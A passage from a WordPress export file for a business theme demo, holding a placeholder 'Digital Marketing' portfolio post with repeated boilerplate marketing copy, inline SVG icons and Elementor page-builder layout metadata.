		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Marketing</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/</link>
		<pubDate>Fri, 11 Sep 2020 07:16:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=837</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>August 14, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>837</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:16:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:16:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-marketing]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[838]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[839]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3be3337c","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"5befbf60","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ce70032","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3f822f27","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"68851ebc","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"250ea23d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"71c341e4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6542827e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"371f6bc3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1eb0ca9d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"71f04c6a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3d3344ee","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"832149d","elType":"widget","settings":{"editor":"<p>August 14, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5342643c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6f721437","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2f3d08dd","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"6b706da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"63060966","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"75e4e9b8","elType":"section","settings":[],"elements":[{"id":"6bda05f8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"52f0b92f","elType":"widget","settings":{"title":"<span style=\"color:#52c5b6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"54d9052f","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3b65fe94","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7545e3c5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"605dfd7a","elType":"widget","settings":{"title":"<span style=\"color:#52c5b6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2518391b","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"633f728b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4070ca87","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f1792de","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7cf09702","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"27507c6a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6c19f0d0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4db11d58","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4723e5a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7844df75","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d819e34","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"58ded439","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"3c1686f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"414945e5","elType":"widget","settings":{"title":"<span style=\"color:#52c5b6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"77c59310","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52c5b6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5a688754","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8f83c9f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6eea0e82","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i: